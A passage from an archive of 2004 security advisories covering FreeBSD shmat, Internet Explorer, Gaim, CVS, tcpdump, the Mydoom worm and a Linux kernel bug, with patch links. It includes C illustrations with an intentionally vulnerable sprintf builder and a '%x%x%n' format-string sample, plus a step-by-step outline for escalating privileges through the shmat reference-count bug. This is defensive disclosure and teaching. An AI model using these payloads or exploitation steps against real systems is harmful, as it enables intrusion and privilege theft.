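To make the bug class concrete, the following C program is an added illustration, not Check Point's code: the function names, the buffer size and the sample request are constructed for this example. It shows the pattern the advisory describes (an error message assembled from the request reaching sprintf() as its format string) next to a hardened form that keeps the format a literal and bounds the destination, plus a small reviewer-side check that counts '%' bytes in request data.

```c
#include <stdio.h>
#include <string.h>

#define ERRBUF_SZ 256

/* "Before": the error text is assembled from the request and then handed to
 * sprintf() as its FORMAT argument. Every '%' the client sent is now parsed
 * as a conversion: "%x" reads stack words, "%n" writes to memory. Kept only
 * as the vulnerable half of the comparison; never call it on untrusted data. */
static int build_error_vulnerable(char *out, const char *request)
{
    char msg[ERRBUF_SZ];

    /* Step 1: request text becomes part of the message body (bounded, fine). */
    snprintf(msg, sizeof msg, "Invalid HTTP request: %s", request);
    /* Step 2, the defect: msg (attacker-influenced) is used as the format,
     * and the destination has no length bound at all. */
    return sprintf(out, msg);
}

/* "After": the format is a string literal, the request is only ever consumed
 * by a "%s" conversion, and the output buffer is length-bounded. */
static int build_error_safe(char *out, size_t outsz, const char *request)
{
    return snprintf(out, outsz, "Invalid HTTP request: %s", request);
}

/* Reviewer/fuzzer-side check: number of '%' bytes in a request fragment.
 * Any non-zero count reaching a printf-family format argument is a finding. */
static size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (; *s != '\0'; s++)
        if (*s == '%')
            n++;
    return n;
}

/* Returns 1 if the safe builder reproduces the request byte for byte
 * (i.e. the '%' sequences survive as literal text, not as conversions). */
static int safe_builder_keeps_input_literal(const char *request)
{
    char out[ERRBUF_SZ];
    build_error_safe(out, sizeof out, request);
    return strstr(out, request) != NULL;
}

int main(void)
{
    /* Constructed sample request carrying format directives. */
    const char *req = "GET /%x%x%n HTTP/1.0";
    char out[ERRBUF_SZ];

    build_error_safe(out, sizeof out, req);
    printf("safe  : %s\n", out);
    printf("check : %zu format directive(s) in request data\n",
           count_format_directives(req));
    /* build_error_vulnerable(out, req) is intentionally not invoked on req;
     * with this input it would interpret %x/%n instead of printing them. */
    (void)build_error_vulnerable;
    return 0;
}
```

The hardened builder is what a compiler flag such as -Wformat-security flags for: it only ever passes a literal as the format, so request bytes can never be interpreted as conversions.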

Patches

See the Check Point bulletin at:
http://www.checkpoint.com/techsupport/alerts/security_server.html



Shared memory reference count overflow in shmat()

2004-02-05

Risk level: medium

Type: local system compromise

Source of info: PINE Digital Security

Impact

Local users can elevate their privileges in FreeBSD with System V Shared Memory.

Overview

The shmat(2) function maps a shared memory segment, previously created with the shmget(2) function, into the address space of the calling process.

This function is implemented in the sysv_shm.c file:

        -- sysv_shm.c lines 317-322 --
        vm_object_reference(shm_handle->shm_object);
        rv = vm_map_find(&p->p_vmspace->vm_map,
                         shm_handle->shm_object,
                         0, &attach_va, size,
                         (flags & MAP_FIXED) ? 0 : 1,
                         prot, prot, 0);

        if (rv != KERN_SUCCESS) return ENOMEM;
        -- end of code snippet --

The shmat(2) function first increases the reference count of the underlying vm_object and then attempts to insert the vm_object into the process address space.

The vulnerability occurs because the shmat(2) function forgets  to decrease the reference count when the vm_map_find function returns failure.

Since the caller of shmat(2) can specify the address at which the segment should be mapped it is possible to have vm_map_find return failure and thus end up with stale references.

Exploitability

This vulnerability can be exploited (reliably) by local users:

One would first create a shared memory segment using the shmget(2) function and create two separate mappings at different locations in the process address space using the shmat(2) function.

After making around 2^32-2 (invalid) calls to the shmat(2) function the reference count of the underlying vm_object will wrap around to 1.

After deleting one of our mappings using the shmdt(2) function the underlying vm_object will be freed and we will still have one (extraneous) mapping hanging around.

One would then invoke some magic trickery and execute a suid binary which will reuse the freed vm_object for its stack segment.

At this point one could write directly into the stack segment of the suid binary (using the extraneous mapping) and thus escalate one's privileges easily.
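The following C model is an added example, not FreeBSD's sysv_shm.c, covering both the Overview and the Exploitability text above. It reproduces the reference-first, map-second ordering of the snippet with a toy object whose counter is deliberately 8 bits wide, so the wraparound that the "around 2^32-2 calls" step relies on appears after 255 failed calls instead, shows the corrected error path that drops the reference again, and checks whether one shmdt() after the failed calls frees the object while a mapping still points at it. All names (toy_vm_object, toy_map_find, shmat_buggy, shmat_fixed) are this example's own.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Toy vm_object: an 8-bit counter instead of the kernel's int, so the
 * wraparound fits in a quick test. `freed` records that the last reference
 * was dropped, which in the kernel would release the object. */
struct toy_vm_object {
    uint8_t refcnt;
    bool    freed;
};

static void toy_object_reference(struct toy_vm_object *o)
{
    o->refcnt++;    /* unsigned arithmetic: 255 + 1 wraps to 0 */
}

static void toy_object_deallocate(struct toy_vm_object *o)
{
    if (--o->refcnt == 0)
        o->freed = true;
}

/* Stand-in for vm_map_find(): fails when the requested fixed address is
 * already occupied, a condition the caller of shmat(2) can arrange. */
static int toy_map_find(bool addr_occupied)
{
    return addr_occupied ? -1 : 0;      /* -1 plays the role of !KERN_SUCCESS */
}

typedef int (*attach_fn)(struct toy_vm_object *, bool);

/* Mirrors the ordering of the snippet: reference first, map second, and on
 * failure return ENOMEM without undoing the reference just taken. */
static int shmat_buggy(struct toy_vm_object *o, bool addr_occupied)
{
    toy_object_reference(o);
    if (toy_map_find(addr_occupied) != 0)
        return ENOMEM;                  /* the reference leaks here */
    return 0;
}

/* Corrected error path: drop the reference again when mapping fails. */
static int shmat_fixed(struct toy_vm_object *o, bool addr_occupied)
{
    toy_object_reference(o);
    if (toy_map_find(addr_occupied) != 0) {
        toy_object_deallocate(o);
        return ENOMEM;
    }
    return 0;
}

/* The advisory's sequence: two live mappings, `failed_calls` attach attempts
 * at an occupied address, then one shmdt(). Returns true if the object is
 * freed while a mapping still refers to it (a dangling mapping). */
static bool detach_leaves_dangling_mapping(attach_fn attach, unsigned failed_calls)
{
    struct toy_vm_object obj = { .refcnt = 0, .freed = false };
    int live_mappings = 0;

    for (int i = 0; i < 2; i++)         /* two successful shmat() calls */
        if (attach(&obj, false) == 0)
            live_mappings++;

    for (unsigned i = 0; i < failed_calls; i++)
        (void)attach(&obj, true);       /* each one returns ENOMEM */

    toy_object_deallocate(&obj);        /* shmdt() of one mapping */
    live_mappings--;

    return obj.freed && live_mappings > 0;
}

int main(void)
{
    /* With an 8-bit counter, 2 + 255 failed calls wraps the count to 1, so the
     * single detach that follows drops it to 0. */
    printf("buggy shmat, 255 failed calls: dangling mapping = %s\n",
           detach_leaves_dangling_mapping(shmat_buggy, 255) ? "yes" : "no");
    printf("fixed shmat, 255 failed calls: dangling mapping = %s\n",
           detach_leaves_dangling_mapping(shmat_fixed, 255) ? "yes" : "no");
    return 0;
}
```

The point the model makes is that the counter width only sets how many failed calls are needed; the defect is the missing release on the error path, and the fix is the matching deallocate before returning ENOMEM.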

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:02/shmat.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:02/shmat.patch.asc




Multiple Vulnerabilities in Microsoft Internet Explorer

2004-02-02

Risk level: high

Type: many types

Source of info: CERT

Impact

Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow a remote attacker to execute arbitrary code with the privileges of the user running IE.

Overview

Microsoft Security Bulletin MS04-004 describes three vulnerabilities in Internet Explorer. These vulnerabilities are listed below. More detailed information is available in the individual vulnerability notes. Note that in addition to IE, any applications that use the IE HTML rendering engine to interpret HTML documents may present additional attack vectors for these vulnerabilities.

VU#784102 - Microsoft Internet Explorer Travel Log Cross Domain Vulnerability

A cross-domain scripting vulnerability exists in the Travel Log functionality of Internet Explorer. This vulnerability could allow a remote attacker to execute arbitrary script in a different domain, including the Local Machine Zone.
(Other resources: CAN-2003-01026)

VU#413886 - Microsoft Internet Explorer Drag-and-Drop Operation Vulnerability

Internet Explorer allows remote attackers to direct drag and drop behaviors and other mouse click actions by using method caching (SaveRef) to access the window.moveBy method.
(Other resources: CAN-2003-01027)

VU#652278 - Microsoft Internet Explorer does not properly display URLs

Microsoft Internet Explorer does not properly display the location of HTML documents. An attacker could exploit this behavior to mislead users into revealing sensitive information.
(Other resources: CAN-2003-01025)

Impact

These vulnerabilities have different impacts, ranging from disguising the true location of a URL to executing arbitrary commands or code. Please see the individual vulnerability notes for specific information. The most serious of these vulnerabilities (VU#784102) could allow a remote attacker to execute arbitrary code with the privileges of the user running IE. The attacker could exploit this vulnerability by convincing the user to access a specially crafted HTML document, such as a web page or HTML email message. No user intervention is required beyond viewing the attacker's HTML document with IE.

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-004.

Note: The fix included in MS04-004 for VU#652278 may cause sites that use URLs of the form "username:password@www.example.com" to break. This change, along with workarounds for users and administrators of such sites, is covered in Microsoft KB Article 834489.

Patches

Microsoft Security Bulletin MS04-004:
<http://microsoft.com/technet/security/bulletin/MS04-004.asp>



Vulnerabilities in Gaim instant-messaging client

2004-01-29

Risk level: medium

Type: remote system compromise

Source of info: SuSE Security Team

Impact

Gaim is a multi-protocol instant-messaging client. Stefan Esser found 12 vulnerabilities in gaim that can lead to a remote system compromise with the privileges of the user running GAIM.

Overview

The GAIM package that SUSE LINUX ships is affected by just two of these bugs:
        - Yahoo Packet Parser Overflow
        - HTTP Proxy Connect Overflow

The first vulnerability is easy to exploit and results in a classic stack overflow which can be used to execute arbitrary code.
The latter vulnerability requires the gaim client to use an HTTP proxy under the control of the attacker. The exploitation of this bug results in arbitrary code execution too.

There is no known workaround.

Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, to apply the update use the command "rpm -Fhv file.rpm". Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web.


Patches

  SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gaim-0.67-65.i586.rpm
      09f8d12dd52e246cf32dca8ad3374f39
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gaim-0.67-65.i586.patch.rpm
      3a633e341b9e56facdbe0250b55dd33a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/gaim-0.67-65.src.rpm
      5ee6a86077c0297a64815532782f7a54

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gaim-0.59.8-60.i586.rpm
      7a269744304f72bf951c7bd6974560f2
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gaim-0.59.8-60.i586.patch.rpm
      e7b18f0da02c1c4392dc1b03e835a827
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/gaim-0.59.8-60.src.rpm
      ae7d7b1c9735696244547a0d6a5ee92e

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/gaim-0.59-158.i586.rpm
      22b1d4be5737906f8ff0975918279034
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/gaim-0.59-158.i586.patch.rpm
      7644020869e92cc980b881efebf9d617
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/gaim-0.59-158.src.rpm
      cd1532f71a79ed32d016d456a844ff4b

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/gnm3/gaim-0.50-187.i386.rpm
      7dcb581b78bf8ab61e82bf0836a4357e
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/gnm3/gaim-0.50-187.i386.patch.rpm
      5a6f596538edc56e0b3a70a23200c21e
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/gaim-0.50-187.src.rpm
      d38c8da629941eecef7f75d6a5ea9e80



Updated cvs resolves security vulnerability

2004-01-28

Risk level: medium

Type: many types

Source of info: Fedora Legacy Team

Impact

Updated cvs packages are now available that fix a security vulnerability which may allow cvs to attempt to create files and directories in the root file system, as well as prevent the cvsd from retaining root privileges after a user login.

Overview

CVS (Concurrent Version System) is a version control system that can record the history of your files (usually, but not always, source code). CVS only stores the differences between versions, instead of every version of every file you have ever created. CVS also keeps a log of who, when, and why changes occurred.

A flaw was found in versions of CVS prior to 1.11.10 where a malformed module request could cause the CVS server to attempt to create files or directories at the root level of the file system. However, normal file system permissions would prevent the creation of these misplaced directories. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0977 to this issue.

Another flaw was found that would allow the cvsd process to continue to run as root after a user login. Previously, any user with the ability to write the CVSROOT/passwd file could execute arbitrary code as the root user on systems with CVS pserver access enabled.

Users of cvs should update to these update packages, which contain a backported security patch that corrects this issue.

Fedora Legacy would like to thank Seth Vidal, Jason Rohwedder and Christian Pearce for providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

Patches

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/cvs-1.11.1p1-9.7.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/cvs-1.11.1p1-9.7.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/cvs-1.11.1p1-9.7.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/cvs-1.11.1p1-9.7.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/cvs-1.11.2-9.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/8.0/updates/i386/cvs-1.11.2-9.legacy.i386.rpm




Updated mc packages fix buffer overflow vulnerability

2004-01-28

Risk level: high

Type: Buffer overflow

Source of info: Mandrake Security Team

Impact

A buffer overflow was discovered in mc's virtual filesystem code. This vulnerability could allow remote attackers to execute arbitrary code during symlink conversion.

Overview

The updated packages have been patched to correct the problem.

Patches

To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

A list of FTP mirrors can be obtained from:

  http://www.mandrakesecure.net/en/ftp.php



Updated tcpdump packages fix several vulnerabilities

2004-01-28

Risk level: high

Type: many types

Source of info: Mandrake Security Team

Impact

A number of vulnerabilities were discovered in tcpdump versions prior to 3.8.1 that, if fed a maliciously crafted packet, could be exploited to crash tcpdump or potentially execute arbitrary code with the privileges of the user running tcpdump.

Overview

These vulnerabilities include:

An infinite loop and memory consumption processing L2TP packets (CAN-2003-1029).

Infinite loops in processing ISAKMP packets (CAN-2003-0989, CAN-2004-0057).

A segmentation fault caused by a RADIUS attribute with a large length value (CAN-2004-0055).

The updated packages are patched to correct these problems.

Patches

To upgrade automatically use MandrakeUpdate or urpmi.  The verification of md5 checksums and GPG signatures is performed automatically for you.
A list of FTP mirrors can be obtained from:
  http://www.mandrakesecure.net/en/ftp.php

Updated Packages:
 Corporate Server 2.1:
 c9c3cb66d49d3c61c09db1df364309aa  corporate/2.1/RPMS/tcpdump-3.7.2-2.1.C21mdk.i586.rpm
 a0731e1d0f8bb67e27796486ee0ac6de  corporate/2.1/SRPMS/tcpdump-3.7.2-2.1.C21mdk.src.rpm

 Corporate Server 2.1/x86_64:
 3eba37e4c75f54916c3c15b126710c43  x86_64/corporate/2.1/RPMS/tcpdump-3.7.2-2.1.C21mdk.x86_64.rpm
 a0731e1d0f8bb67e27796486ee0ac6de  x86_64/corporate/2.1/SRPMS/tcpdump-3.7.2-2.1.C21mdk.src.rpm

 Mandrake Linux 9.1:
 aa337b3beb1371a5ceace20db36c5dfa  9.1/RPMS/tcpdump-3.7.2-2.1.91mdk.i586.rpm
 99e8f3cb2c6cc748ca8c8d24ab555029  9.1/SRPMS/tcpdump-3.7.2-2.1.91mdk.src.rpm

 Mandrake Linux 9.1/PPC:
 df878fa0b993bcc53cb852a4b3a6b0bb  ppc/9.1/RPMS/tcpdump-3.7.2-2.1.91mdk.ppc.rpm
 99e8f3cb2c6cc748ca8c8d24ab555029  ppc/9.1/SRPMS/tcpdump-3.7.2-2.1.91mdk.src.rpm

 Mandrake Linux 9.2:
 595518640b2291ce10e26b943debf84b  9.2/RPMS/tcpdump-3.7.2-2.1.92mdk.i586.rpm
 8e3520db919980c762c7acce742f9831  9.2/SRPMS/tcpdump-3.7.2-2.1.92mdk.src.rpm

 Mandrake Linux 9.2/AMD64:
 efd0e0b8f9796b3ba98d3da63d5b38c2  amd64/9.2/RPMS/tcpdump-3.7.2-2.1.92mdk.amd64.rpm
 8e3520db919980c762c7acce742f9831  amd64/9.2/SRPMS/tcpdump-3.7.2-2.1.92mdk.src.rpm

 Multi Network Firewall 8.2:
 3eaac937cfc3d2390a2eda8dd431fc56  mnf8.2/RPMS/tcpdump-3.7.2-2.1.M82mdk.i586.rpm
 a33365b5a8d47668764615ec6713869f  mnf8.2/SRPMS/tcpdump-3.7.2-2.1.M82mdk.src.rpm



Internet Worm.Mydoom.A under attack

2004-01-27

Risk level: high

Type: Worm

Source of info: Symantec

Impact

Worm.Mydoom.A (W32.Novarg.A@mm) is a mass-mailing worm that arrives as an attachment with the file extension .bat, .cmd, .exe, .pif, .scr, or .zip. When a computer is infected, the worm will set up a backdoor into the system by opening TCP ports 3127 through 3198. This can potentially allow an attacker to connect to the computer and use it as a proxy to gain access to its network resources. In addition, the backdoor has the ability to download and execute arbitrary files.

The worm will perform a DoS starting on February 1, 2004. It also has a trigger date to stop spreading on February 12, 2004.

Overview

1. Creates the following files:
          * %System%/shimgapi.dll
          * %temp%/Message (This file is full of random letters and is displayed using Notepad.)
          * %System%/taskmon.exe (If a copy of taskmon.exe exists in %System%, it is overwritten and replaced by this copy of the worm.)

      Notes:
          * taskmon.exe is a legitimate file in Windows 95/98/Me operating systems, stored in the %Windir% folder (by default, this is C:\Windows or C:\Winnt). Do not delete this file by mistake.
          * %System% is a variable. The worm locates the System folder and copies itself to that location. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
          * %Temp% is a variable. The worm locates the temporary folder and copies itself to that location. By default, this is C:\Windows\TEMP (Windows 95/98/Me), C:\WINNT\Temp (Windows NT/2000), or C:\Documents and Settings\<UserName>\Local Settings\Temp (Windows XP).

2. Shimgapi.dll acts as a proxy server, opening TCP listening ports in the range of 3127 to 3198. The backdoor also has the ability to download and execute arbitrary files.

3. Adds the value:

      "(Default)" = "%System%\shimgapi.dll"

      to the registry key:

      HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32

      so that shimgapi.dll is loaded by EXPLORER.EXE.

4. Adds the value:

      "TaskMon" = "%System%\taskmon.exe"

      to the registry keys:
          * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
          * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

5. Attempts to perform a Denial of Service attack against www.sco.com by creating 64 threads that send GET requests and use a direct connection to port 80.

      Note: The DoS is active between February 1, 2004 and February 12, 2004.

6. Creates the following registry keys:
          * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
            Explorer\ComDlg32\Version
          * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
            Explorer\ComDlg32\Version

7. Searches for email addresses in files with the following extensions.
          * .htm
          * .sht
          * .php
          * .asp
          * .dbx
          * .tbb
          * .adb
          * .pl
          * .wab
          * .txt
            Note: It ignores addresses which end in .edu.
8. Attempts to send emails using its own SMTP engine. The worm performs a lookup of the mail server used by the recipient before sending the email. If it is unsuccessful, it will use the local mail server instead.

9. The email will have the following characteristics:

      From: may be a spoofed from address

      Subject:
      (one of the following)
          * test
          * hi
          * hello
          * Mail Delivery System
          * Mail Transaction Failed
          * Server Report
          * Status
          * Error

            Message:
            (one of the following)
          * Mail transaction failed. Partial message is available.
          * The message contains Unicode characters and has been sent as a binary attachment.
          * The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

            Attachment:
            (one of the following)
          * document
          * readme
          * doc
          * text
          * file
          * data
          * test
          * message
          * body

            Notes:
          * The attachment may have two suffixes. If so, the first suffix will be one of the following:
                o .htm
                o .txt
                o .doc
          * The worm will always end with one of the following suffixes:
                o .pif
                o .scr
                o .exe
                o .cmd
                o .bat
                o .zip
          * The icon displayed will look like the following: [icon image not reproduced in this copy], unless the worm has .exe or .scr for an extension, in which case the file will use the following icon: [icon image not reproduced in this copy]

10. Copies itself to Kazaa download folder as one of the following files:
          * winamp5
          * icq2004-final
          * activation_crack
          * strip-girl-2.0bdcom_patches
          * rootkitXP
          * office_crack
          * nuke2004

            with a file extension of:
          * .pif
          * .scr
          * .bat
          * .exe





An update for a newly discovered vulnerability in Microsoft Internet Security and Acceleration Server 2000

2004-01-14

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

An update for a newly discovered vulnerability in Microsoft Internet Security and Acceleration Server 2000. This vulnerability is rated Critical.

Overview

An update is available to fix this vulnerability.
For additional information, including Technical Details, Workarounds, answers to Frequently Asked Questions, and Update Deployment Information please read the Microsoft ISA Server Security Bulletin Summary for January at:
http://www.microsoft.com/technet/security/bulletin/isajan04.asp

Patches

See:
http://www.microsoft.com/technet/security/bulletin/isajan04.asp




An update for a newly discovered vulnerability in Microsoft Exchange Server 2003.

2004-01-14

Risk level: moderate

Type: Elevation of privilege

Source of info: Microsoft Security Team

Impact

Vulnerability in Exchange Server 2003 Could Lead to Privilege Escalation.

Overview

An update is available to fix this vulnerability.
For additional information, including Technical Details, 
Workarounds, answers to Frequently Asked Questions, and Update 
Deployment Information please read the Microsoft Exchange Server 
2003 Security Bulletin Summary for January at:
http://www.microsoft.com/technet/security/bulletin/excjan04.asp

Patches

See:
http://www.microsoft.com/technet/security/bulletin/excjan04.asp



An update for a newly discovered vulnerability in Microsoft Data Access Components (MDAC)

2004-01-14

Risk level: Important

Type: Remote code execution

Source of info: CERT

Impact

Buffer Overrun in MDAC Function Could Allow Code Execution

Overview

An update is available to fix this vulnerability.
For additional information, including Technical Details, 
Workarounds, answers to Frequently Asked Questions, and Update 
Deployment Information please read the Microsoft Windows Security 
Bulletin Summary for January at:
http://www.microsoft.com/technet/security/bulletin/winjan04.asp

Patches

See:
http://www.microsoft.com/technet/security/bulletin/winjan04.asp



SGI Advanced Linux Environment security update #8

2004-01-07

Risk level: high

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI has released Patch 10040: SGI Advanced Linux Environment security update #8, which includes updated RPMs for SGI ProPack v2.3 for the Altix family of systems.

Overview

The patch has been created in response to the following errata released by Red Hat:
 Updated lftp packages fix security vulnerability
 http://rhn.redhat.com/errata/RHSA-2003-404.html

Patches

Patch 10040 is available from http://support.sgi.com/ and
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/

The individual RPMs from Patch 10040 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS





Bugs in linux kernel (in do_mremap function)

2004-01-05

Risk level: high

Type: local system compromise

Source of info: SuSE Security Team

Impact

Incorrect bounds checking in one of the kernel functions can lead to local system compromise.

Overview

The do_mremap() function of the Linux Kernel is used to manage (move, resize) Virtual Memory Areas (VMAs). By exploiting an incorrect bounds check in do_mremap() during the remapping of memory it is possible to create a VMA with a size of 0.
In normal operation do_mremap() leaves a memory hole of one page and creates an additional VMA of two pages. In case of exploitation no hole is created but the new VMA has a length of 0 bytes.
The Linux Kernel's memory management is corrupted from this point and can be abused by local users to gain root privileges.

There is no temporary workaround for this bug.

Patches

 Intel i386 Platform:

    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-166.i586.rpm
      0bbda4a9166edcdd4444fa43a5b37f10
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-166.src.rpm
      3cce21862c2d54a82742c74557dcc7fa
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-166.i586.rpm
      6df247b9f114e8636de2c673747ef6ea
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-166.src.rpm
      c06a81d1e7912db429df25e8e8d754b7
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-166.i586.rpm
      0da9470eb573ecb5c801bedbd5dbf666
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-166.src.rpm
      34393ea6b46a8b8859d51020e1dc275e
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-166.i586.rpm
      0b0d23a4a6918e57a1e7c45504a50df7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-166.src.rpm
      26cadc4c9d77dc6e433bedc458166236
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-166.i586.rpm
      7e18d9b0b89ef72bee40bbf150dd0470
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-166.src.rpm
      ad8c357792c0d34570c9ba54a579d867
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-166.i586.rpm
      48b46c943cc15aacfba0ec68090de1f6
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-166.src.rpm
      ef71c55f61b595edc24be7c318237432

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-102.i586.rpm
      61de636fab3149ee5d45d16dccf8d0e8
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-102.src.rpm
      80b8f44b6f8f4d039b8954c709b457b0
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-102.i586.rpm
      c25b57bc5d67d87177abf7953f022331
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-102.src.rpm
      29d014e79a3ee0b14a23cb0e4bdd0f0e
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-102.i586.rpm
      d42041b08cdee2d9959a4a6dad8b6e9d
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-102.src.rpm
      22e598ebf546cd9378c852042b602f2f
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-102.i586.rpm
      c2e0455b45eac55c97e13322ab40e4bc
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-102.src.rpm
      68b2d35ae0de009ac3fbc6ee9a0bb3fd
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-102.i586.rpm
      0f539af39523fd27232289014db36202
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-102.src.rpm
      14c238bbbd7758abc2b4113a7297f2b5

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-168.i586.rpm
      8299b1153d3d9d81236e4e77f3ae66e2
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-168.src.rpm
      0705e6bb739aaec77bc9801760e60051
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-168.i586.rpm
      fea1ffe95acdbc5c00d3272b3867bd39
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-168.src.rpm
      aeff9339c71c275fd3c7e9ebcf49cc4f
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-168.i586.rpm
      f4e41bdd0806673d82dc0971e36da0e1
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-168.src.rpm
      f352afbf4c6d679fd4bf40347bd7989c
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_debug-2.4.21-168.i586.rpm
      81e9a2516e7b9a8d0234f2d6ee9e4444
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_debug-2.4.21-168.src.rpm
      8b6c8e51c93c9dcbf5d34587de722a4a
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-168.i586.rpm
      9961f14d44c40a83be800ad463e17e51
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-168.src.rpm
      f3caa2e715d24a2987408e29e0623737

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-282.i386.rpm
      62ae55de1c6abbe821b99165cbccdce7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-282.src.rpm
      c65eadb1dd7225463f7a29979ab43dd8
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-282.i386.rpm
      7fdec3995171a6d88f293c10c41e6991
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-282.src.rpm
      08a2cba4382f4bb8adfc5cb8f80677d1
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-282.i386.rpm
      955386318df968aac6c66b6071eb466a
    source rpm(s):
